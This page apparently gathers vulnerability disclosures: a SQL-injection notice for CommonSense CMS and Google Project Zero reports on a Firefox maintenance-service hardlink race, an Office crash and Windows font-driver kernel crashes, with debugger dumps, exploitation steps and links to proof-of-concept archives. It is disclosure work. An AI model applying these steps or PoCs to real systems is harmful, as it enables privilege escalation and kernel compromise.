source: https://www.securityfocus.com/bid/55893/info
CommonSense CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/special.php?id=1 [SQL Injection]
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293861
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://code.google.com/p/google-security-research/issues/detail?id=427&can=1
Mozilla Maintenance Service: Log File Overwrite Elevation of Privilege
Platform: Windows
Version: Mozilla Firefox 38.0.5
Class: Elevation of Privilege
Summary:
The maintenance service creates a log file in a user writable location. It’s possible to change the log file to a hardlink to another file to cause file corruption or elevation of privilege.
Description:
When the maintenance service starts it creates a log file under c:\programdata\mozilla\logs. This is done in maintenanceservice.cpp/SvcMain. This directory it creates the file in has fairly permissive permissions which allows a normal user to create new files underneath that directory. It’s possible to race the creation of the log file during the service initialization to drop a hardlink to an existing file on the same drive (which is probably the system drive) which when opened by the maintenance service running as local system will cause the file to be overwritten by the log data.
At the very least this would corrupt the target file, however as the user has some control over bits of the contents, such as the updater path, it’s possible to get some user controlled contents in there. This might be used to elevate privileges by overwriting a script file which has a permissive parser, such as powershell, batch or HTA which subsequently gets executed by a privileged process.
The only slight difficulty in exploitation is that the user cannot directly delete the log file to replace it with a hardlink. However this isn’t a significant issue as before opening the log file the service backs up the log to a new name leaving the directory entry for “maintenanceservice.log” free. Therefore there’s a race condition between the log file being moved out of the way and the new log file being created.
So to exploit this you perform the following operations:
1. Start a thread which creates a hard link in the log directory to the file you want to overwrite. Repeat until successful.
2. In another thread start the service passing the arbitrary content you want to insert as the path to the updater file
A similar vulnerability exists in the update.status handling, for example in WriteStatusFailure which will write update.status to any location you specify. You can use a hardlink to force the file to be overwritten. In this case this would only cause file corruption as the user has no real control on the contents.
If I could recommend fixes either make the logs directory writable only by administrators or use CopyFile instead of MoveFile when backing up the previous logs. I would not recommend trying to do anything like inspecting the file for hardlinks or similar.
Proof of Concept:
I’ve attached a proof of concept, it’s written in C#. You’ll need to compile it with the C# csc compiler. NOTE: you might need to run this on a multi-core machine to stand a chance of winning the race.
1) Compile the PoC
2) Execute the PoC passing the name of a file you want to overwrite on the command line
3) Program should run and print Done if successful
Expected Result:
The log file is created as normal
Observed Result:
The target file has been overwritten with the contents of the log file
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37925.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=431&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0xA9B0. Standard tools did not identify anything significant about this offset in the minimized file.
Attached files:
Fuzzed minimized PoC: 3423415565_min.doc
Fuzzed non-minimized PoC: 3423415565_crash.doc
Original non-fuzzed file: 3423415565_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000
Observed Crash:
eax=0000b69a ebx=0e370fb8 ecx=0e431ee8 edx=0e433fc0 esi=abcdbbbb edi=fffffffe
eip=6bdd9ddf esp=00129c58 ebp=00129c9c iopl=0 nv up ei pl nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
MSPTLS!LssbFIsSublineEmpty+0xa327:
6bdd9dc4 83e808 sub eax,8
6bdd9dc7 4f dec edi
6bdd9dc8 3930 cmp dword ptr [eax],esi
6bdd9dca 7ff8 jg MSPTLS!LssbFIsSublineEmpty+0xa30c (6bdd9dc4)
6bdd9dcc 897ddc mov dword ptr [ebp-24h],edi
6bdd9dcf 8bc7 mov eax,edi
6bdd9dd1 6bc01c imul eax,eax,1Ch
6bdd9dd4 03c8 add ecx,eax
6bdd9dd6 8b7118 mov esi,dword ptr [ecx+18h]
6bdd9dd9 8945d4 mov dword ptr [ebp-2Ch],eax
6bdd9ddc 8b04fa mov eax,dword ptr [edx+edi*8]
=> 6bdd9ddf 8b5670 mov edx,dword ptr [esi+70h] ds:0023:abcdbc2b=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00129c9c 6bdda05b 02000000 00129cb0 0e370fa0 MSPTLS!LssbFIsSublineEmpty+0xa327
00129cb8 6bdd481c 0e370fb8 00129d04 00129d48 MSPTLS!LssbFIsSublineEmpty+0xa5a3
00129cf8 6bde528a 0019f4cd 0019f4cd 00000000 MSPTLS!LssbFIsSublineEmpty+0x4d64
00129d70 6bde54c2 0e186fa0 00129dc8 0012a038 MSPTLS!LssbFIsSublineEmpty+0x157d2
00129d98 6bddf354 02996ec0 00129f14 0e186fa0 MSPTLS!LssbFIsSublineEmpty+0x15a0a
00129f9c 6bdc4b85 02990320 000002d4 0019f4cd MSPTLS!LssbFIsSublineEmpty+0xf89c
00129fd0 312dbeea 02990320 000002d4 0019f4cd MSPTLS!LsCreateLine+0x23
0012a044 312dba15 02a33088 0ca8c9c0 000002d4 wwlib!FMain+0x97933
0012a0ac 312db45a 0af2cf30 0e811fe8 000002d4 wwlib!FMain+0x9745e
0012a19c 6be51b27 0af2cf30 0cb10fb0 01cccb78 wwlib!FMain+0x96ea3
0012a23c 6be6a137 00000000 0e811fe8 0ccccb78 MSPTLS!FsDestroyMemory+0x1ee4e
0012a310 6be6d6f8 00000000 00000033 00000000 MSPTLS!FsDestroyMemory+0x3745e
We can see that esi has an application verifier heap chunk canary value used at the start of allocated chuncks. Clearly we've indexed somewhere we shouldn't be. In this case we can see that esi came from [ecx+18h] and ecx was moved backwards in memory due to the negative value in edi. These pointers are used later on in the vulnerable function to write data leading to memory corruption.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37924.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=382&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ffb4da9f, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 92a7a902, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
READ_ADDRESS: ffb4da9f Special pool
FAULTING_IP:
ATMFD+2a902
92a7a902 0fb600 movzx eax,byte ptr [eax]
MM_INTERNAL_CODE: 0
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 92a50000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0xD6
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 945bcd54 -- (.trap 0xffffffff945bcd54)
ErrCode = 00000000
eax=ffb4da9f ebx=945bd0ec ecx=ffb4da9f edx=ffb4dea8 esi=945bd2fc edi=00002932
eip=92a7a902 esp=945bcdc8 ebp=945bd4c0 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
ATMFD+0x2a902:
92a7a902 0fb600 movzx eax,byte ptr [eax] ds:0023:ffb4da9f=??
Resetting default scope
LAST_CONTROL_TRANSFER: from 82723ce7 to 826bf2d8
STACK_TEXT:
945bc8a4 82723ce7 00000003 46aca596 00000065 nt!RtlpBreakWithStatusInstruction
945bc8f4 827247e5 00000003 00000000 00000002 nt!KiBugCheckDebugBreak+0x1c
945bccb8 826d2391 00000050 ffb4da9f 00000000 nt!KeBugCheck2+0x68b
945bcd3c 82684c48 00000000 ffb4da9f 00000000 nt!MmAccessFault+0x104
945bcd3c 92a7a902 00000000 ffb4da9f 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
945bd4c0 92a7f6e0 fab90c70 92a8f028 945bd70c ATMFD+0x2a902
945bd57c 92a727ae fab90c70 92a8f028 945bd70c ATMFD+0x2f6e0
945bd668 92a72858 fab90c70 945bd70c 945bd790 ATMFD+0x227ae
945bd694 92a632b2 fab90c70 92a8f028 945bd70c ATMFD+0x22858
945bd7f8 92a63689 0000000b 945bd918 fb64c8b0 ATMFD+0x132b2
945bd84c 92a5406d 0000000b 945bd918 fb64c8b0 ATMFD+0x13689
945bd8a0 92badcf2 ff7a5010 fa4f4cf0 00000001 ATMFD+0x406d
945bd8e8 92bb3784 ff7a5010 fa4f4cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
945bd960 92c2bdcd 945bdc3c fb665704 fb64c8b0 win32k!xInsertMetricsPlusRFONTOBJ+0x120
945bd990 92ba5964 00000003 ff7bf020 945bdcd4 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
945bd9c8 92c2b8cb 945bdc1c 945bdc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
945bda0c 92ba55e7 945bdcd0 00000003 945bdc1c win32k!ESTROBJ::vInit+0x268
945bdc2c 92ba57aa 00000000 945bdcd0 fa4f4cf0 win32k!GreGetTextExtentExW+0x12a
945bdd0c 82681a66 20010483 00b20b1c 00000003 win32k!NtGdiGetTextExtentExW+0x141
945bdd0c 773c70f4 20010483 00b20b1c 00000003 nt!KiSystemServicePostCall
0031f6d4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The memory read instruction causing the crash is responsible for fetching the next CharString instruction from the input stream, in order to execute it as part of the PostScript state machine. This bug is similar to issue 174 , which described the lack of the instruction pointer's bounds checking in the interpreter function, making it possible to crash the operating system or potentially disclose chunks of kernel-mode memory. While that problem was fixed in bulletin MS15-021 by introducing the missing bound checks, out-of-bounds access to the instruction stream is still possible as shown in the above crash log. The exact root cause of the vulnerability is unknown.
The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it might also possible to observe a crash on a default Windows installation, depending on the specific testcase used.
Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37923.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=383&can=1
We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff67a024, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 98b54072, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL
READ_ADDRESS: ff67a024 Paged session pool
FAULTING_IP:
ATMFD+34072
98b54072 8b700c mov esi,dword ptr [eax+0Ch]
MM_INTERNAL_CODE: 0
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 98b20000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 9d793d9c -- (.trap 0xffffffff9d793d9c)
ErrCode = 00000000
eax=ff67a018 ebx=fbea4830 ecx=00000000 edx=00000000 esi=fbffe7c0 edi=fbffe7c0
eip=98b54072 esp=9d793e10 ebp=9d793e38 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
ATMFD+0x34072:
98b54072 8b700c mov esi,dword ptr [eax+0Ch] ds:0023:ff67a024=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 82714ce7 to 826b02d8
STACK_TEXT:
9d7938ec 82714ce7 00000003 8d6243ee 00000065 nt!RtlpBreakWithStatusInstruction
9d79393c 827157e5 00000003 00000000 00002522 nt!KiBugCheckDebugBreak+0x1c
9d793d00 826c3391 00000050 ff67a024 00000000 nt!KeBugCheck2+0x68b
9d793d84 82675c48 00000000 ff67a024 00000000 nt!MmAccessFault+0x104
9d793d84 98b54072 00000000 ff67a024 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
9d793e38 98b4d5b5 fbffe7c0 fbea4830 00000f5c ATMFD+0x34072
9d794544 98b4f6e0 fbbfac70 98b5f028 9d794790 ATMFD+0x2d5b5
9d794600 98b427ae fbbfac70 98b5f028 9d794790 ATMFD+0x2f6e0
9d7946ec 98b42858 fbbfac70 9d794790 9d794814 ATMFD+0x227ae
9d794718 98b332b2 fbbfac70 98b5f028 9d794790 ATMFD+0x22858
9d79487c 98b33689 0000000b 9d79499c fad3ef00 ATMFD+0x132b2
9d7948d0 98b2406d 0000000b 9d79499c 00000000 ATMFD+0x13689
9d794924 9888dcf2 ff7a5010 fad30cf0 00000001 ATMFD+0x406d
9d79496c 988767cb ff7a5010 fad30cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
9d7949e0 988a1513 ffa6a130 fb23bd40 0000134b win32k!xInsertMetricsRFONTOBJ+0x9c
9d794a14 988a35f5 00000020 9d794aec 9d794c8a win32k!RFONTOBJ::bGetGlyphMetrics+0x131
9d794cb8 988b6684 0c010385 00001360 00000040 win32k!GreGetCharABCWidthsW+0x147
9d794d14 82672a66 0c010385 00001340 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
9d794d14 772b70f4 0c010385 00001340 00000040 nt!KiSystemServicePostCall
0017ed34 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The crash represents a read from invalid memory; prior to being dereferenced as an address, the EAX register is loaded with a value from ESI+0x34 (on 32-bit Windows), which points into an "Adbe" pool allocation:
---
kd> !pool fbffe7c0
Pool page fbffe7c0 region is Special pool
Address fbffe000 does not belong to any pool
*fbffe000 size: 898 data: fbffe768 (Paged session) *Adbe
Pooltag Adbe : Adobe's font driver
---
The crash is always caused by an attempt to access memory at a constant offset past the memory page boundary (0x24 on 32-bit platforms), and the surrounding code is a loop over a linked list of structures. The EAX register at the time of the crash holds a [F/B]link address which points to unmapped memory, potentially suggesting that the root cause of the crash is a use-after-free condition, or some kind of corruption of the linked list. Since the invalid address is later used to manipulate memory, we expect that this issue could be used to achieve remote code execution in the security context of the Windows kernel.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Attached is an archive with a proof of concept font file together with a corresponding kernel crash log.
------------------------------------------------------------------------------------------------------------------------------------------
We have also encountered a number of crashes where the read operation discussed above succeeds (moving the contents of [eax+0Ch] to esi), and a respective attempt to access the [esi+34h] address fails a few instructions later; for example:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fffb8034, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 9486407b, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 8278184c
Unable to read MiSystemVaType memory at 82760f00
fffb8034
FAULTING_IP:
ATMFD+3407b
9486407b 394e34 cmp dword ptr [esi+34h],ecx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 9485d5b5 to 9486407b
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
879d7e38 9485d5b5 fba78880 fbbb6830 00000f5c ATMFD+0x3407b
879d8544 9485f6e0 fbad2c70 9486f028 879d8790 ATMFD+0x2d5b5
879d8600 948527ae fbad2c70 9486f028 879d8790 ATMFD+0x2f6e0
879d86ec 94852858 fbad2c70 879d8790 879d8814 ATMFD+0x227ae
879d8718 948432b2 fbad2c70 9486f028 879d8790 ATMFD+0x22858
879d887c 94843689 00000002 879d899c fbafaf58 ATMFD+0x132b2
879d88d0 9483406d 00000002 879d899c 00000000 ATMFD+0x13689
879d8924 9499dce2 ff7af010 fc01acf0 00000001 ATMFD+0x406d
879d896c 949867bb ff7af010 fc01acf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
879d89e0 949b14d7 ffa66130 ff646084 0000201c win32k!xInsertMetricsRFONTOBJ+0x9c
879d8a14 949b35b9 00000020 879d8bfc 879d8cac win32k!RFONTOBJ::bGetGlyphMetrics+0x131
879d8cb8 949c6644 10010188 00002020 00000040 win32k!GreGetCharABCWidthsW+0x147
879d8d14 82654896 10010188 00002000 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
879d8d14 776f70f4 10010188 00002000 00000040 nt!KiSystemServicePostCall
001bf3e4 00000000 00000000 00000000 00000000 0x776f70f4
---
Attached are further three samples together with corresponding crash log files, which reproduce the issue at the ATMFD+0x3407b location.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37922.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=384&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fff82008, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91a3440b, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL
READ_ADDRESS: fff82008
FAULTING_IP:
ATMFD+3440b
91a3440b 8b7e08 mov edi,dword ptr [esi+8]
MM_INTERNAL_CODE: 0
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 91a00000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 97ff8d54 -- (.trap 0xffffffff97ff8d54)
ErrCode = 00000000
eax=ff677018 ebx=00000001 ecx=00000001 edx=0000000b esi=fff82000 edi=fb63e940
eip=91a3440b esp=97ff8dc8 ebp=97ff8de8 iopl=0 nv up ei ng nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
ATMFD+0x3440b:
91a3440b 8b7e08 mov edi,dword ptr [esi+8] ds:0023:fff82008=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 82724ce7 to 826c02d8
STACK_TEXT:
97ff88a4 82724ce7 00000003 4b979438 00000065 nt!RtlpBreakWithStatusInstruction
97ff88f4 827257e5 00000003 00000000 00000000 nt!KiBugCheckDebugBreak+0x1c
97ff8cb8 826d3391 00000050 fff82008 00000000 nt!KeBugCheck2+0x68b
97ff8d3c 82685c48 00000000 fff82008 00000000 nt!MmAccessFault+0x104
97ff8d3c 91a3440b 00000000 fff82008 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
97ff8de8 91a345f7 fb6ba380 0000000b fb6ba3ac ATMFD+0x3440b
97ff8e10 91a29eec fb63e8c0 ff6770d8 91a463ec ATMFD+0x345f7
97ff8e34 91a2e987 fb8f4c70 91a463ec 00000f5c ATMFD+0x29eec
97ff9544 91a2f6e0 fb8f4c70 91a3f028 97ff9790 ATMFD+0x2e987
97ff9600 91a227ae fb8f4c70 91a3f028 97ff9790 ATMFD+0x2f6e0
97ff96ec 91a22858 fb8f4c70 97ff9790 97ff9814 ATMFD+0x227ae
97ff9718 91a132b2 fb8f4c70 91a3f028 97ff9790 ATMFD+0x22858
97ff987c 91a13689 ffffffff 97ff999c fb68af58 ATMFD+0x132b2
97ff98d0 91a0406d ffffffff 97ff999c 00000000 ATMFD+0x13689
97ff9924 91b2dcf2 ff7a5010 fb700cf0 00000001 ATMFD+0x406d
97ff996c 91b167cb ff7a5010 fb700cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
97ff99e0 91b41513 ffa6a130 fb93cb14 000000e0 win32k!xInsertMetricsRFONTOBJ+0x9c
97ff9a14 91b435f5 00000020 97ff9a3c 97ff9c74 win32k!RFONTOBJ::bGetGlyphMetrics+0x131
97ff9cb8 91b56684 020101c3 00000100 00000020 win32k!GreGetCharABCWidthsW+0x147
97ff9d14 82682a66 020101c3 000000c0 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
97ff9d14 76ee70f4 020101c3 000000c0 00000040 nt!KiSystemServicePostCall
002cf224 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The crash represents a read from invalid memory; prior to being dereferenced as an address, the ESI register is loaded with a value from EAX+0x30 (on 32-bit Windows), which points into an "Adbe" pool allocation:
---
0: kd> !pool 9d619018
Pool page 9d619018 region is Paged session pool
9d619000 is not a valid large pool allocation, checking large session pool...
*9d619000 : large page allocation, Tag is Adbe, size is 0x4018 bytes
Pooltag Adbe : Adobe's font driver
---
The surrounding code is a loop over a linked list of structures; the ESI register at the time of the crash holds a [F/B]link address which points to unmapped memory, potentially suggesting that the root cause of the crash is a use-after-free condition, or some kind of corruption of the linked list. Since the invalid address is later used to manipulate memory, we expect that this issue could be used to achieve remote code execution in the security context of the Windows kernel.
Moreover, we have also encountered similar crashes one instruction further in the code - in these cases, ESI turned out to accidentally point to mapped memory, but its contents did not correspond to the ATMFD's expectations (reinforcing the use-after-free hypothesis), thus resulting in an attempt to dereference a completely wild memory address, e.g.:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: eebd8451, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 9205440e, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
---
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Note that this crash is very similar in its nature to Issue 383 (invalid memory access while traversing a linked list of "Adbe" structures); however, due to uncertainty about the reason of the crash and the different stack traces, I am filing this as a separate report for now.
Attached is an archive with six proof of concept font files (three for each crash location) together with corresponding kernel crash logs.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37921.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=385&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: a3a3a3db, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 91f445c9, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL
WRITE_ADDRESS: a3a3a3db
FAULTING_IP:
ATMFD+345c9
91f445c9 83483810 or dword ptr [eax+38h],10h
MM_INTERNAL_CODE: 2
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 91f10000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 879cfd8c -- (.trap 0xffffffff879cfd8c)
ErrCode = 00000002
eax=a3a3a3a3 ebx=00000008 ecx=00000004 edx=fb964900 esi=fb80e380 edi=fb80e3a0
eip=91f445c9 esp=879cfe00 ebp=879cfe10 iopl=0 nv up ei ng nz ac pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010297
ATMFD+0x345c9:
91f445c9 83483810 or dword ptr [eax+38h],10h ds:0023:a3a3a3db=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 826f4ce7 to 826902d8
STACK_TEXT:
879cf8dc 826f4ce7 00000003 5e64199c 00000065 nt!RtlpBreakWithStatusInstruction
879cf92c 826f57e5 00000003 c06028e8 a3a3a3db nt!KiBugCheckDebugBreak+0x1c
879cfcf0 826a3391 00000050 a3a3a3db 00000001 nt!KeBugCheck2+0x68b
879cfd74 82655c48 00000001 a3a3a3db 00000000 nt!MmAccessFault+0x104
879cfd74 91f445c9 00000001 a3a3a3db 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
879cfe10 91f39eec fb964900 ff657038 91f563ec ATMFD+0x345c9
879cfe34 91f3e987 fb9bec70 91f563ec 00000f5c ATMFD+0x29eec
879d0544 91f3f6e0 fb9bec70 91f4f028 879d0790 ATMFD+0x2e987
879d0600 91f327ae fb9bec70 91f4f028 879d0790 ATMFD+0x2f6e0
879d06ec 91f32858 fb9bec70 879d0790 879d0814 ATMFD+0x227ae
879d0718 91f232b2 fb9bec70 91f4f028 879d0790 ATMFD+0x22858
879d087c 91f23689 ffffffff 879d099c fb874f58 ATMFD+0x132b2
879d08d0 91f1406d ffffffff 879d099c 00000000 ATMFD+0x13689
879d0924 91c7dcf2 ff7a5010 fbeeccf0 00000001 ATMFD+0x406d
879d096c 91c667cb ff7a5010 fbeeccf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
879d09e0 91c91513 ffa6a130 fb81e8d0 0000004f win32k!xInsertMetricsRFONTOBJ+0x9c
879d0a14 91c935f5 00000020 879d0b2c 879d0c92 win32k!RFONTOBJ::bGetGlyphMetrics+0x131
879d0cb8 91ca6684 040101b7 00000060 00000040 win32k!GreGetCharABCWidthsW+0x147
879d0d14 82652a66 040101b7 00000040 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
879d0d14 771870f4 040101b7 00000040 00000040 nt!KiSystemServicePostCall
0012f1d4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The crash occurs while trying to modify memory under an invalid address. More specifically, the "a3a3a3a3" bytes found in the EAX register at the time of the crash are a repetition of a random byte filled by Driver Verifier in each pool allocation before returning it to the caller. This means that the dereferenced pointer is in fact an uninitialized value from the kernel pool.
The offending code (containing the crashing instruction) is as follows:
---
.text:000445C6 loc_445C6:
.text:000445C6 mov eax, [esi+ecx*4]
.text:000445C9 or dword ptr [eax+38h], 10h
.text:000445CD inc ecx
.text:000445CE cmp ecx, ebx
.text:000445D0 jl short loc_445C6
---
As shown above, there is a loop iterating EBX times over an array of addresses stored in [ESI]. At the time of the bugcheck, EBX=8, so the code expects 8 valid pointers in the array; however, only 4 pointers are properly initialized:
---
kd> dd fb80e380
fb80e380 fb964980 fb9649c0 fb964900 fb964940
fb80e390 a3a3a3a3 a3a3a3a3 a3a3a3a3 a3a3a3a3
fb80e3a0 a3a3a3a3 a3a3a3a3 a3a3a3a3 a3a3a3a3
---
The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37920.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=368&can=1
We have encountered a number of Windows kernel crashes in the win32k!itrp_IUP function (a handler of the IUP[] TTF program instruction) while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6895b8, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 91f4a4f1, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
[...]
FAULTING_IP:
win32k!itrp_IUP+2fb
91f4a4f1 8904b2 mov dword ptr [edx+esi*4],eax
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
